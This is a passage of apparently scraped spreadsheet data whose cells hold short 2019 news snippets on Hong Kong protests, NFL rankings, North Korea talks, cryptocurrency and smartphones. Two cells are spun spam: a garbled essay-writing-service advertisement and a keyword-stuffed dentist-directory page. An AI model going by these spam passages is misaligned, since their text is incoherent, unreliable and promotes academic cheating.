officer with the pole, the officer fires at the man at point-blank range. Hours after the shooting, the Hong Kong police commissioner, Stephen Lo, said the officer who shot the protester had acted in a “legal and reasonable” manner, having given a verbal warning before opening fire. The officer had been assaulted at close quarters, Mr. Lo said, and had no other choice but to shoot. “The range was not determined by the police officer, but by the perpetrator,” he said. But the Hong Kong Public Doctors’ Association, which represents doctors working in public hospitals and medical departments at the University of Hong Kong, condemned the officer on Tuesday for not using a less powerful weapon, such as a rifle that shoots beanbag rounds, to subdue the protester. In a statement on Wednesday morning, the protester’s high school, Tsuen Wan Public Ho Chuen Yiu Memorial College, said that faculty members and the student body “all feel very sad and worried” about the shooting. The school’s administration had opened a crisis management unit that includes psychologists and social workers to help students cope, the statement said. Mr. Lo, the police commissioner, told reporters at an overnight news conference that the police had arrested the protester who was shot, but that the force would decide later whether to press charges. At the meeting with the alumni on Wednesday, the school’s principal and vice principal said that the student would not be punished and would keep his place in the school. The principal, Tse Yun Ming, lowered his gaze as he absorbed an onslaught of criticism from the former students. “My emotions are also fluctuating,” he told them at one point. But Mr. Leung, the city’s former chief executive, criticized the student’s conduct. “Could you not directly denounce his wrongdoing,” he asked in a Facebook post, suggesting that before being shot the student “surrounded and beat the police on the streets in full gear along with other rioters.” Sit-in protests were expected Wednesday afternoon in at least seven Hong Kong districts, including in Tseun Wan, where the shooting occurred. Tsuen Wan is a working-class district miles from the gleaming skyscrapers of the city’s financial district. Ezra Cheung and Tiffany May contributed reporting. Source link</t>
  </si>
  <si>
    <t>XXXX</t>
  </si>
  <si>
    <t>Our talented team of artists, illustrators and cartoonists give us their humorous version of the news of the day.</t>
  </si>
  <si>
    <t>Swedish Telugu Dictionary – travel dictionary to translate Swedish to Telugu. Click on the list to show Swedish or Telugu synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Swedish Telugu Dictionary →</t>
  </si>
  <si>
    <t>Council tenants living in Dundee can expect an inflation-busting rent increase of at least 3% next year under plans going out to consultation today.</t>
  </si>
  <si>
    <t>A model has burst into tears and fainted after unexpectedly having more than 30 centimetres of her long hair suddenly cut off on TV.</t>
  </si>
  <si>
    <t>A Brisbane councillor likened the proposed development at the "tired" site to the popular James Street precinct in Fortitude Valley.</t>
  </si>
  <si>
    <t>Film opened to dismal reviews and a $20 million opening weekend See full article at Independent.co.uk » The post Gemini Man on track to be Will Smith’s biggest box office flop since Wild Wild West appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Eating at the Pokemon Cafe in Tokyo! | Traveling to Japan The post Eating at the Pokemon Cafe in Tokyo! | Traveling to Japan appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>“I’ve never seen him complain. Always smiling, friendly, supportive. He’s a team leader… a very loving guy,” said a close friend of the man who died.</t>
  </si>
  <si>
    <t>The Frenchman, who has been paralysed for four years, was strapped into an exoskeleton driven by a computer able to read signals from his brain.</t>
  </si>
  <si>
    <t>“I hope we can mediate,” Donald Trump says, as concerns grow in the US over Turkey’s move into Syria. The post US Republicans seek sanctions on Turkey over Syria appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Labor's internal review of the 2019 federal election has been told the party's "white, Anglo men" failed to communicate with female voters.</t>
  </si>
  <si>
    <t>submitted by /u/soonpls [link] [comments] [AMA] NeuralCam brings Night Mode to iPhone 11’s Ultra Wide camera, along with an iPhone 11 giveaway!</t>
  </si>
  <si>
    <t>Jasmine Andersson</t>
  </si>
  <si>
    <t>Mr Dunn’s parents, Charlotte Charles and Tim Dunn, flew to the US on Sunday to ‘put pressure on the US administration to do the right thing’</t>
  </si>
  <si>
    <t>The former Labor minister could be granted conditional release following a decision by the parole authority.</t>
  </si>
  <si>
    <t>Alasdair Mackenzie</t>
  </si>
  <si>
    <t>Puma strip is supposed to represent heritage - but some Azzurri fans are far from pleased The post ‘Sacrilege!’: Italy’s new green kit provokes furious reaction at home as they prepare to unveil ‘Maglia Verde’ against Greece appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>http://instagram.com/brookexbeauty LAST YEARS VIDEO: http://www.youtube.com/watch?v=xqXbTs29tj8 ____________________________________________________________ TWITTER : http://twitter.com/#!/brookexbeauty TUMBLR: http://pocket-full-0f-sunshine.tumblr.com/ iPHONE/VLOGS: http://www.youtube.com/user/brookesiphone ADVICE: http://advice-from-brooke.tumblr.com/ EMAIL: brookexxbeauty@aol.com FACEBOOK FAN PAGE: http://www.facebook.com/BrookexBeauty ____________________________________________________________ Look For THESE Videos Soon! -Q&amp;A Video -Mom&amp;Me Video! -Smoothie Video! -Drugstore Makeup Starter Kit! -Collab with sincerlystefanie (FASHION) ftc: bought it all. no affiliation i pinky promise! my thoughts 4 realz, true […] The post Sleepaway Camp: What To Bring and My Packing Tips! appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>During a speech to Canadian Union of Public Employees, Singh made no mention of the Bloc Québécois -- a party rising in the polls and competing for Quebec votes, both inside and outside the labour movement.</t>
  </si>
  <si>
    <t>Skexis</t>
  </si>
  <si>
    <t>Was looking at the post re the GearWrench set and had a quick look around the auto store sites to see how they compared and found this deal. All sizes between 8-19mm. Reviews seem positive. Note - these don't have the flexible heads the GearWrench ones do.</t>
  </si>
  <si>
    <t>A History of Best Apa Research Paper Writing Services Refuted Dissertation writing is a difficult level to achieve. Research paper writing is among the most challenging academic pursuits. It is among the most challenging academic pursuits. There are a number of ways on the ideal method to compose an essay. Generally, you will contend powerfully for the principal cause in this kind of essay. An obvious essay might be carried through with good variety of phrases. Writing an essay is one https://writing-online.net/essaywritingserviceuk-co-uk-review of the best headaches. Together with the UK Essay Help undergraduates can’t be worried about the time but delight in a comprehensive life. Together with all the UK Essay Help undergraduates cannot be worried about the time but delight in an extensive life. Together with it Help undergraduates cannot worry about the time but enjoy a full life. You can hire us for all sorts of essays. When you begin to compose an expository essay, it genuinely will be fairly crucial to attempt to perform problems within the suitable way. 7Dollar Essay is the remedy to all your issues. With us, you don’t need to worry your essay will be plagiarized. Thus, you’re going to get the essay based on your requirements. You may be asking yourself which is the very best essay creating company on the site. If https://writing-online.net/writemypaper4me-org-review you want to cover your essay to get it written, then you’re in a ideal spot. Thus, is a service, where you could purchase essays. The essay is now the most significant part of a university appllication, see sample essays. If your essay is describing a process, like how to make an immense chocolate cake, ensure your paragraphs fall in the correct purchase. Whatever the case, the previous essay will be customized consistent with the guidelines and directions provided. To start with, you should read top essay writing services reviews, which you’re going to be in a position to discover at our website. With us, you can rest assured you will get an perfect essay for appropriate money. Best Apa Research Paper Writing Services: No Longer a Mystery APA research paper writing may be a real issue for each student. Irrespective of your level of education, you’re going to get our study papers at honest pricing. Irrespective of your level of schooling, you’re going to get our study papers at acceptable rates. Paper is able to help you ensure your paper is in its best before it’s submitted. PAPER writing style is one of the well-known formats. As a consequence of their experience in writing, there’s simply no way they can supply you a plagiarized paper. You are able to have the finest academic paper, with an ideal subject, the most. You’re just likely to commence writing a fantastic term paper, and because you’re reading the requirements, you freeze. When you choose to obtain essay papers online, it can be quite daunting at first as there are a gigantic collection of websites offering such services. When it regards essay services. In addition, the writing quality can be very low. At any time you have learned the exact first caliber of your book you must. You might also describe the scope of your research. You could also describe the range of your research. Don’t forget that it isn’t the goal of APA format to produce the document seem nice. Writing help gives an awareness of morale to students who are a small weak boost with the support of aid. It’s possible to require the best essay help online. If you’re facing problems in buy your research paper, we are the ideal solution. Finding a great idea of the kind of keywords to set in your paper outline is able to help you focus and structure your essay. When you know the ideal spot to turn, you’re likely in order to start a research paper without difficulty. Once you know the ideal spot to turn, you’re likely to be in a place to start a research paper effortlessly. The perfect place to start is to identify what you desire. Start your research the moment it’s feasible for you. Research writing includes a lot of issues that you might not have the capacity to manage independently. A research student will be whoever will be confusing and concluding a superior deal of info in his head. The structure and style demands working with a typical number of areas for the large part of the texts you may have to build inside a greater education or university. So, the tradition of producing an effective research isn’t too quick! APA is a specific formatting style which may assist in preventing plagiarism.</t>
  </si>
  <si>
    <t>Lender expects housebuying and price growth to remain subdued amid Brexit uncertaintyAnnual house price growth in the UK has slowed to the lowest pace in six years, according to Halifax, one of the country’s biggest mortgage lenders.The average price of a house was £232,574 in September, down 0.4% from in August – the first monthly fall since May, Halifax said. Prices rose 1.1% year on year, marking the smallest annual gain since April 2013. Continue reading… Read More</t>
  </si>
  <si>
    <t>A Virginia college student told police she was “doing cocaine with the devil” when she flew into a psychotic rage and fatally knifed her best friend and roommate more than 30 times, a report said.</t>
  </si>
  <si>
    <t>Gennadiy Golovkin hasn’t fully dominated a top-five middleweight in quite a while. Can he do it to Sergiy Derevyanchenko Source: Sports Business News</t>
  </si>
  <si>
    <t>What is the cultural polite thing considered to be where Prince William is visiting? Is it considered polite to adopt their attire? @mrjamesob Is it what they would wish him to wear? Is he following local custom? We shouldnt put our apprehension on it if his hosts appreciate it — Jay #StopBrexit #FBPE (@jaypwright) October... Continue reading</t>
  </si>
  <si>
    <t>ORDER OF PLAY Play starts at 11am unless otherwise stated CENTRE COURT Anastasija SEVASTOVA (LAT) [6] v Aliaksandra SASNOVICH (BLR) Anastatsia POTAPOVA (RUS) v [WC] Anna KALINSKAYA (RUS) After 2 APT matches Not before 6:30pm Svetlana KUZNETSOVA (RUS) v Karolina MUCHOVA (CZE) COURT 1 Isabella SHINIKOVA (BUL) v Jana CEPELOVA (SVK) Giulia GATTO-MONTICONE (ITA) v Varvara GRACHEVA (RUS) After 1 ATP match Nadiia KICHENOK (UKR) / Raluca OLARU (ROU) v Vitalia DIATCHENKO (RUS) / Lyudmyle KICHENOCK (UKR) COURT 2 Kaia KANEPI (EST) v Tereza MARTINCOVA (CZE) Kirsten FLIPKENS (BEL) v Gabriela DABROWSKI (CAN) Timea BABOS (HUN) / Kristina MLADENOVI (FRA) v Vivian HEISEN (GER) / HSIEH Yu-Chieh (TPE) After suitable rest Anna KALINSKAYA (RUS) / Yulia PUTINTSEVA (KAZ) v Nicola GEUER (GER) / Elixane LECHEMIA (FRA) COURT 3 Play starts at 12 noon Oksana KALASHINIKOVA (GEO) / Natalia VIKHLYANTSEVA (RUS) v Darija JURAK (CRO) / Alicja ROSOLSKA (POL) [14] Seven of Wimbledon quarterfinalist Kaia Kanepi’s last nine main draw matches have gone to three sets. She has won four of these. The post Moscow 2019: Monday’s Order of Play and Match Points appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>ITV Good Morning Britain viewers were infuriated over the coverage of Coleen Rooney and Rebekah Vardy’s row over “leaked stories,” which took up much of the show. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Philip G. Pavely-USA TODAY Sports The Pittsburgh Steelers have plenty of work to do before they are even considered a Top 15 team in 2019. The Pittsburgh Steelers are now 1-4 after Week 5 of the 2019 regular season, but how they got to this record has been a roller coaster ride. After a 33-3 drubbing by the defending champion New England Patriots, the Steelers followed it up with a close 28-26 loss to the Seattle Seahawks in Week 2 at Heinz Field. The loss was more than just another loss on the record, but the team lost Ben Roethlisberger in the process. With Mason Rudolph under center in Week 3, he was unable to lead the Steelers to victory over the San Francisco 49ers in Santa Clara, but did claim his first career win after beating the Cincinnati Bengals on Monday Night Football in Week 4. How did they follow up that prime time win? With a gut-wrenching overtime loss to the Baltimore Ravens at Heinz Field in Week 5. But before we get ahead of ourselves, it is that time of week where we check in on what other outlets are saying about the black-and-gold in those weekly Power Ranking articles. We all realize these rankings are completely meaningless, but they are great for discussion. Not just where the Steelers are ranked, but who made the Top 5 who should have, or shouldn’t have? Check out the Power Rankings below, and be sure to let us know your thoughts on the rankings in the comment section below! ESPN 1. New England Patriots 2. New Orleans Saints 3. Kansas City Chiefs 4. Green Bay Packers 5. Seattle Seahawks 6. San Francisco 49ers 7. Los Angeles Rams 8. Dallas Cowboys 9. Philadelphia Eagles 10. Buffalo Bills … 26. Pittsburgh Steelers “Surprise fantasy player: Diontae Johnson, WR While JuJu Smith-Schuster has been mostly quiet as the primary focus of opposing defenses, Johnson — a rookie — is slowly breaking out. In Mason Rudolph’s first two starts, Johnson was targeted six times in each game and had a touchdown in both contests. When Devlin Hodges came in Sunday, he hit Johnson for a monster third-down conversion, but Johnson’s downfall will be his trouble holding on to the ball. He fumbled the third-down pass out of bounds, though it still was ruled a completion, and fumbled his first catch a week ago. — Brooke Pryor” CBS Sports 1. New England Patriots 2. San Francisco 49ers 3. New Orleans Saints 4. Seattle Seahawks 5. Green Bay Packers 6. Kansas City Chiefs 7. Buffalo Bills 8. Philadelphia Eagles 9. Dallas Cowboys 10. Los Angeles Rams … 26. Pittsburgh Steelers “They are down to a third-team quarterback and at 1-4 things sure don’t look good for this group. Is the season over? It might be soon.” Sporting News 1. New England Patriots 2. New Orleans Saints 3. Green Bay Packers 4. Seattle Seahawks 5. Kansas City Chiefs 6. San Francisco 49ers 7. Los Angeles Rams 8. Philadelphia Eagles 9. Dallas Cowboys 10. Minnesota Vikings … 26. Pittsburgh Steelers “Ben Roethlisberger to Mason Rudolph to … Devlin Hodges? The Steelers’ offense can’t catch a break even when it’s looking good and balanced again. Mike Tomlin seems safe job-wise unless he keeps making illogical decisions about overtime and “things of that nature.”” NFL.com 1. New England Patriots 2. New Orleans Saints 3. Kansas City Chiefs 4. San Francisco 49ers 5. Green Bay Packers 6. Philadelphia Eagles 7. Seattle Seahawks 8. Dallas Cowboys 9. Los Angeles Rams 10. Buffalo Bills … 26. Pittsburgh Steelers “Another lost quarterback, another lost game in what’s fast becoming a lost season for the Steelers. A violent hit by Earl Thomas knocked Mason Rudolph out cold against the Ravens, forcing Mike Tomlin to turn to a person named Devlin Hodges. Nothing good happens when you get to your third quarterback by early October. The shame for Pittsburgh is how close it came to a win over Baltimore that would have reframed the AFC North. Had Juju Smith-Schuster not lost that fumble in overtime, the Steelers might be sitting in a three-way tie for first in the disappointing AFC North. Instead, they are two games out with an un drafted rookie free agent with the nickname “Duck” in line for a potential Week 6 start. Life’s tough, guys.”</t>
  </si>
  <si>
    <t>James Segeyaro’s NRL career appears over after he was provisionally suspended for allegedly taking the same banned substance that threatens the future of Australian swimmer Shayna Jack.</t>
  </si>
  <si>
    <t>Prince George and Princess Charlotte were pictured cheering on Aston Villa with their parents on Saturday afternoon. Read more? Click here</t>
  </si>
  <si>
    <t>Everything you need to know to find a winner at the mid-week metropolitan meeting.</t>
  </si>
  <si>
    <t>Aerial footage shows the route of the People's Vote march through central London. The post Hyde Park to Parliament in 60 seconds appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>WHEN it comes to luxury living on the waterfront, it doesn’t get much better than this.</t>
  </si>
  <si>
    <t>RARE footage of an enormous mass of squid eggs has been filmed off Cape Tribulation as the Great Barrier Reef prepares for its annual spawning season.</t>
  </si>
  <si>
    <t>Stephen Grant is "exceptionally computer literate" and forensic evidence links him to the crime, a court has been told.</t>
  </si>
  <si>
    <t>Week 5 NFL Picks against the Spread – SportsRaid Philadelphia -13 vs New York Jets Neither of these teams has played in a long time. The Jets had an early bye, and the Eagles got 10 desperately needed days off after a huge Thursday night win in Green Bay. Doug Pederson’s Eagles typically take care of bad teams with ease, and the Jets are really bad. Philly’s cornerback woes make them ripe for a backdoor cover against most teams, but we won’t fear Luke Falk. Minnesota -5 at New York Giants Whether or not Kirk Cousins is bad, the Vikings are just way better than the Giants, and they should win this game with ease on the strength of their defense alone. Danny Dukes may have enjoyed life against the Bucs and Redskins, but this is a different challenge, and Saquon Barkley is still out. Either the Vikings win easily or, if the Stefon Diggs locker room drama is real, they blow the game completely and the season is over early. Detroit -21.5 at Miami Just kidding. The Dolphins are on a bye this week, but they still gave up a Lions touchdown while you were reading this sentence anyway. Kansas City -8.5 vs Indianapolis Remember how the Colts defense was supposed to be bad last year and then it wasn’t? Turns it it’s bad again, second to last in DVOA through one month. Bad defense plus Patrick Mahomes, throw in a road game and lots of key Colts injuries, and this sounds like a disaster waiting to happen. Original Source Follow us on Twitter The post Week 5 NFL Picks against the Spread – SportsRaid appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Andrew Taylor</t>
  </si>
  <si>
    <t>Harry Triguboff's Meriton says Sydney cannot continue to sprawl west when there are large undeveloped sites in the east.</t>
  </si>
  <si>
    <t>The haunt continues for South Australia’s spookiest house, following a frightening auction result last week.</t>
  </si>
  <si>
    <t>An exuberant top-scoring floor routine by U.C.L.A.’s Katelyn Ohashi went viral this year, making her one of the most famous college gymnasts ever. But N.C.A.A rules prevented Ohashi from making any money from the performance. In this Video Op-Ed, Ohashi argues that college students should be given the ability to earn income from their athletic achievement. Last week, Gov. Gavin Newsom of California signed a law to do just that. The Fair Pay to Play Act, would allow college athletes to strike endorsement deals, a move that would transform the entire business model of college sports. Changing the rules would be especially beneficial for women and athletes in sports that lack professional leagues. But California’s changes aren’t scheduled to take effect until 2023, and that leaves the N.C.A.A. plenty of time to mount challenges to the law. If the law is upheld, the N.C.A.A. will have to decide whether to penalize California’s universities with fines, or even expel them from the association. For now, California is betting that the huge size of its college system, and its influence in college sports, will make that impossible. Katelyn Ohashi (@katelyn_ohashi) is an American gymnast and recent graduate of U.C.L.A. Source link</t>
  </si>
  <si>
    <t>#ProHogs In The NFL – Week 5 Report John Thomas October 8, 2019 FAYETTEVILLE, Ark. – Here’s a look at how the 12 former Arkansas football players active on NFL rosters fared this past weekend in Week 5 of the NFL season. BEST OF WEEK 5 Deatrich Wise, Jr., DE, New England Patriots Deatrich Wise, Jr.’s snaps have been sporadic over recent weeks for the New England Patriots, but he has continued to produce when called upon. On Sunday in the 33-7 victory over the Washington Redskins, Wise played just 18 snaps and notched two tackles and a quarterback hit, while also having a tackle for loss. It’s the fourth game he’s appeared in this year and has four tackles to his name along with four quarterback hits. Jason Peters, OL, Philadelphia Eagles Once again, Jason Peters played nearly every snap in Philadelphia’s 31-6 win over the New York Jets. It’s the Eagles’ third win of the year, second-straight, and vaulted them into a tie for first in the NFC Eastern Division. Peters has played in and started all five games for Philadelphia this year and is a major reason that the Eagles have been averaging more than 110 yards rushing per game. Jarius Wright, WR, Carolina Panthers Jarius Wright had a huge Week 4 performance last week and was rewarded in Week 5 against Jacksonville, playing 50 of the 65 offensive snaps. However, he only had one catch for six yards, but it was part of the drive that led to Carolina’s go-ahead touchdown in the first quarter. Wright now has 11 catches this year for 132 yards, but is still looking for his first touchdown reception of the year. Full #ProHogs Performances List Name (Team) Week 5 Stats 2019 Season Stats QB Brandon Allen (DEN) DNP at LA Chargers None DE Trey Flowers (DET) BYE 4 games (4 starts); 15 tackles (8 solo),, 1 sack (3 yards), 1 TFL, 2 QBH, 1 FF LB Dre Greenlaw (SF) 1 game (0 start); 14 snaps (29%), 19 ST snaps vs. Cleveland; 1 assisted tackle 4 games (2 starts); 9 tackles (4 solo) TE Hunter Henry (LAC) INA vs. Denver 1 game (1 start); 4 receptions, 60 yards DE Mitchell Loewen (NO) Practice Squad 1 game (0 start); 2 tackles (2 solo) OL Jason Peters (PHI) 1 game (1 start); 63 snaps (93%) vs. NY Jets 5 games (5 starts) C Frank Ragnow (DET) BYE 4 games (4 starts); 1 tackle, 1 fumble recovery DE Chris Smith (CLE) 1 game (0 start); 17 snaps (22%), 1 ST snap at San Francisco 4 games (0 start); 1 PBU TE Jeremy Sprinkle (WAS) 1 game (1 start); 27 snaps (46%), 18 ST snaps vs. New England; 2 receptions, 17 yards 5 games (4 starts); 7 receptions, 75 yards, 1 tackle DL Armon Watts (MIN) INA at NY Giants None RB Jonathan Williams (IND) 1 game (0 start); 3 ST snaps at Kansas City None DE Deatrich Wise, Jr. (NE) 1 game (0 start); 18 snaps (31%) at Washington; 2 tackles (2 solo), 1 TFL, 1 QBH 4 games (0 start); 2 tackles (4 solo); 2 TFL, 1 sack, 4 QBH, 1 FF WR Jarius Wright (CAR) 1 game (0 start); 50 snaps (77%) vs. Jacksonville; 1 reception, 6 yards 5 games (1 start); 11 receptions, 132 yards Original Source Follow us on Twitter The post #ProHogs In The NFL – Week 5 Report appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>According to new statistics, stablecoin Tether (USDT) seems to now be the most popular cryptocurrency in the world — at least when it comes to trading. While that honor used to belong to Bitcoin (BTC), Tether’s daily trading volume currently appears to be around $3.5 billion larger than that of BTC. Bitcoin still remains the world’s largest cryptocurrency by market cap, and the most expensive one, with the current price of $8,440. However, in recent comparisons of trading volume among the top coins, researchers had discovered that Tether leads as the most used cryptocurrency — with $20.7 billion in trading volume, whereas Bitcoin had $17.2 billion at the time. If you think Bitcoin is the world’s most widely used cryptocurrency, you’re probably wrong https://t.co/ynnKIzsbkG pic.twitter.com/MbPsD5wi4Z — Bloomberg Crypto (@crypto) October 1, 2019 It should be noted that these figures often change, depending on multiple factors. Also, recent weeks have seen greater volatility in Bitcoin and most other altcoins’ prices — which might be one of the reasons why cryptocurrency users turned to a stablecoin such as Tether for price stability. Historically, Tether has always been below Bitcoin in mostly all aspects. It has a much smaller market cap and a price that is supposed to be permanently locked at $1. Meanwhile, Bitcoin’s price tends to make large leaps up and down and is mostly influenced by the market sentiment. Something changed in April when Tether’s trading volume surpassed Bitcoin’s for the first time. Ever since then, the stablecoin has been competing with the largest cryptocurrency — mostly leading for around 18 percent in terms of trading volume height. Tether also lays claim to the world’s largest and most used stablecoin, even though it has a controversial history. Researchers suggest that USDT is also very popular in China, as well as several other Asian countries. Cryptocurrencies are in relatively good standing in most East Asian countries, although the situation in China also remains controversial. Do you use cryptocurrencies? Do you prefer Tether or Bitcoin? Share your thoughts about them in the comments and let us know! Images courtesy of Twitter.</t>
  </si>
  <si>
    <t>Looking good going into 2020… Via CNBC: Unemployment hit a fresh 50-year low in September even though nonfarm payrolls rose by just 136,000 as the economy nears full employment, the Labor Department reported Friday. The jobless rate dropped 0.2 percentage points to 3.5%, matching a level it last saw in December 1969. A more encompassing […]</t>
  </si>
  <si>
    <t>In episode two of our daily trade period podcast series, Michael Gleeson and Peter Ryan take you through the details of Essendon's interest in Collingwood's Mason Cox.</t>
  </si>
  <si>
    <t>and out-of-pocket dental and vision costs. If you withdraw the funds for non-qualified expenses before age 65, you’ll pay a. Top Dental Clinic In Halton Hills The Best Dentists in Halton Hills Handpicked Top 3 Dentists in Halton Hills, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, Halton Hills Denture Clinic Nearby dentists Young Dentistry 324 Guelph Street, Unit 8 Meldrum Orthodontics 116A Guelph Street Karas Dental Clinic 308 Guelph St. Find the best dentist or dental clinic in Halton Hills, ON offering the dental services you are looking for. Find the best dentist or dental clinic in Halton Hills, ON offering the dental services you are looking for. The premier destination for. Highest Rated Dental Clinic Near Halton Hills Ontario The Best 10 Veterinarians in Halton Hills, ON Showing 1-10 of 254 Halton Hills Pets Veterinarians All Filters $ $$ $$$ $$$$ Open Now Sort By Recommended Highest Rated Most Reviewed Cities More Cities Distance Bird's-eye View Driving (8 km.). Cosmetic Dentist Near Halton Hills Ontario Kid Friendly Dentist Near Halton Hills Ontario Fun Things Preferred Dentist In Halton Hills Ontario The Best Dentists in Halton Hills Handpicked Top 3 Dentists in Halton Hills, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to. Ontario Halton Hills Find the best Dentist in Halton Hills, ON. Discover Dentists real customer reviews and contact details, including King’s Daughters Family Care Centers in Burlington and Ironton will host flu clinics 8 a.m. to noon. Ironton Lions provide ‘The Best Scare in the Tri-State’ IRONTON — The Ironton Lions Club. Highest Rated Dental Clinic In Halton Hills Ontario Best Dentists in Halton Hills, ON – Still Waters Dental Group, Dentistry On Sinclair, Downtown Georgetown Dental, Sunnyview Dental – Georgetown, King's Cove Family Dental, Pownall Janet, DDs – Still Waters Dental, Oksana M. Sawiak, DDS IMD. The Best 10 Veterinarians in Halton Hills, ON Showing 1-10 of 254 Halton Hills Pets Veterinarians All Filters Weekend Briefing: First Friday in Flagler Beach, Cycling for Health, Country Fest at Fairgrounds, Inside the CRT Studio – There were buttresses of out-flying spurs, and round green hills were put. The Flagler Free Clinic was established in 2005. Carrier Clinic, Somerset County YMCA, and Beasley Media Group. Patron Partners include SSP Architectural Group, Sobel &amp; Co.</t>
  </si>
  <si>
    <t>VITAMIN D plays an essential role in keeping bones, teeth and muscles healthy. Evidence is shedding a light on how a vitamin D deficiency can impact the body in a number of other ways too. Daily Express :: Health Feed</t>
  </si>
  <si>
    <t>The deputy assistant secretary of state responsible for U.S. policy toward six former Soviet republics including Ukraine is scheduled to appear behind closed doors.</t>
  </si>
  <si>
    <t>SEOUL, South Korea — North Korea and the United States have agreed to resume a long-stalled official dialogue this weekend in an effort to narrow their differences on how to terminate the North’s nuclear weapons program, a senior North Korean diplomat said on Tuesday. Choe Son-hui, first vice foreign minister of North Korea, said her government and Washington had agreed to hold preliminary contact on Friday, to be followed by official working-level negotiations on Saturday. “It is my expectation that the working-level negotiations would accelerate the positive development of the D.P.R.K.-U.S. relations,” Ms. Choe said in a statement carried by the North’s official Korean Central News Agency, using the abbreviation of the country’s official name, the Democratic People’s Republic of Korea. The statement provided no further details. North Korean officials have repeatedly indicated their willingness to resume talks with Washington in recent weeks, especially after the ouster of John R. Bolton as President Trump national security adviser, and Mr. Trump’s suggestion that he would use a “new method” in negotiations. North Korea praised the removal of Mr. Bolton as a “wise political decision,” having long blamed hawkish aides to Mr. Trump for the stalemate in negotiations. When Mr. Trump held his first summit meeting with the North Korean leader, Kim Jong-un, in Singapore in June 2018, Mr. Kim committed to “work toward complete denuclearization of the Korean Peninsula,” in return for better ties and security guarantees with the United States. But subsequent talks quickly stalled over how to enact the vague agreement. The second meeting between Mr. Trump and Mr. Kim, held in Hanoi, Vietnam, in February ended without a deal on how fast and how thoroughly North Korea should dismantle its nuclear program and how soon the United States would start easing or lifting sanctions. On Tuesday, South Korea welcomed the agreement to resume dialogue. “We hope that both sides will use these working-level talks to make quick and concrete progress for the complete denuclearization of the Korean Peninsula and a permanent peace there,” said Ko Min-jung, a spokeswoman for President Moon Jae-in of South Korea. Mr. Trump has not clarified what his new method might be. In Hanoi, Mr. Trump followed Mr. Bolton’s advice when he demanded a quick and comprehensive elimination of North Korea’s weapons of mass destruction — including its nuclear warheads and long-range missiles — before lifting sanctions. But Mr. Kim would not budge from an insistence on a phased rollback of his country’s nuclear program. He offered to first dismantle the facilities at Yongbyon, north of Pyongyang, the North Korean capital, where the regime enriches uranium and plutonium, without giving up any existing atomic bombs or missiles. In return, he demanded that the United States lift the most biting of United Nations sanctions imposed since 2016, including a ban on crucial North Korean exports like coal, iron ore, fish and textiles. Since the Hanoi talks collapsed, North Korea has threatened to abandon diplomacy completely unless Washington returns to the negotiating table with a more flexible offer by the end of the year. The North has escalated its pressure by conducting a slew of short-range weapons tests since July. Source link</t>
  </si>
  <si>
    <t>I love history. [The YouTube] Do you have something you’d like to share? A link? A joke? Some words of wisdom? A topic to discuss? It’s Monday Night Open Thread. What’s on your mind? 0 0</t>
  </si>
  <si>
    <t>'Facilitating murder is the job I was born to do'</t>
  </si>
  <si>
    <t>The province is offering teachers a two per cent annual salary increase, in line with other public sector unions.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/vAPV1vionBc/google-pixel-4-vs-apple-iphone-11-pro-specs-camera-2019-10 Google just laid out its vision for the future of the smartphone with its new Pixel 4 — here’s how it compares to the iPhone 11 and 11 Pro (GOOGL, GOOG, AAPL) Google unveiled the Pixel 4 on Tuesday, its newest flagship smartphone. The phone comes with new motion sensors for unlocking the device more quickly and performing tasks using touchless gestures as well as an improved camera. Starting at $800, the Pixel 4 is a direct competitor to Apple’s iPhone 11 — which also boasts noteworthy camera upgrades over its predecessor. Here’s a look at how the Google Pixel 4’s specifications compare to those of the iPhone 11 and iPhone 11 Pro. Visit Business Insider’s homepage for more stories. Google finally introduced its much-anticipated Pixel 4 smartphone on Tuesday, which offers a dual-lens camera and a new radar-powered motion-detection system. The phone, which begins shipping on October 24, starts at $800 — putting it in direct competition with Apple’s new iPhones. The iPhone 11 starts at $700, while the iPhone 11 Pro begins at $1,000. With the Pixel 4, Google is making a statement about what it envisions as being critical to the future of the smartphone. The Pixel’s 4 new motion sensors and deep integration with the Google Assistant suggest the company’s approach is all about building more intelligence into its products. The Pixel 4 — along with all of the other gadgets Google announced on Tuesday — is the latest result of the company’s “Made by Google” initiative, which the firm launched in 2016 as its first major push into hardware. Read more: I’ve tried every single iPhone Apple currently sells — here’s how to decide which one is right for you Google trails behind rivals like Samsung and Apple in the smartphone industry. Its sliver of the market is so minimal that research firms like The International Data Corporation and Canalys don’t even break out its shipments in their quarterly reports. But Google’s hardware products do serve another important purpose: keeping consumers hooked into its ecosystem of increasingly important services and products like the Google Assistant. If you’re deciding between the Pixel 4 and Apple’s latest iPhones, here’s a look at how their specifications compare. We’ll have a more comprehensive guide on how the Pixel 4 stacks up against Apple’s latest smartphones once we’ve had more time to use it. SEE ALSO: Apple’s next iPhone could mark a new era for the company as it shifts beyond smartphones Camera Both Apple and Google highlighted the camera performance on their new smartphones when unveiling them, and for good reason. Both phones offer high-quality cameras that are better at taking photos in various circumstances — especially the dark — than their predecessors. Here’s a quick look at how the camera specifications compare between the two devices. The Google Pixel 4 has two cameras: one telephoto lens and one standard lens. One lens has a 16 megapixel sensor, while the other has a 12.2-megapixel sensor. Apple’s iPhone 11 also has two cameras, each of which has a 12-megapixel sensor. But the second camera on the iPhone 11 is an ultra-wide-angle camera that offers a significantly wider field of view of 120 degrees. The iPhone 11 Pro has a triple camera system that includes a standard, ultra-wide, and telephoto lens. Google, however, spent more time discussing the Pixel 4’s software-based photography features rather than its hardware. The company showcased new computational photography features that will be available on the Pixel 4, such as a feature that 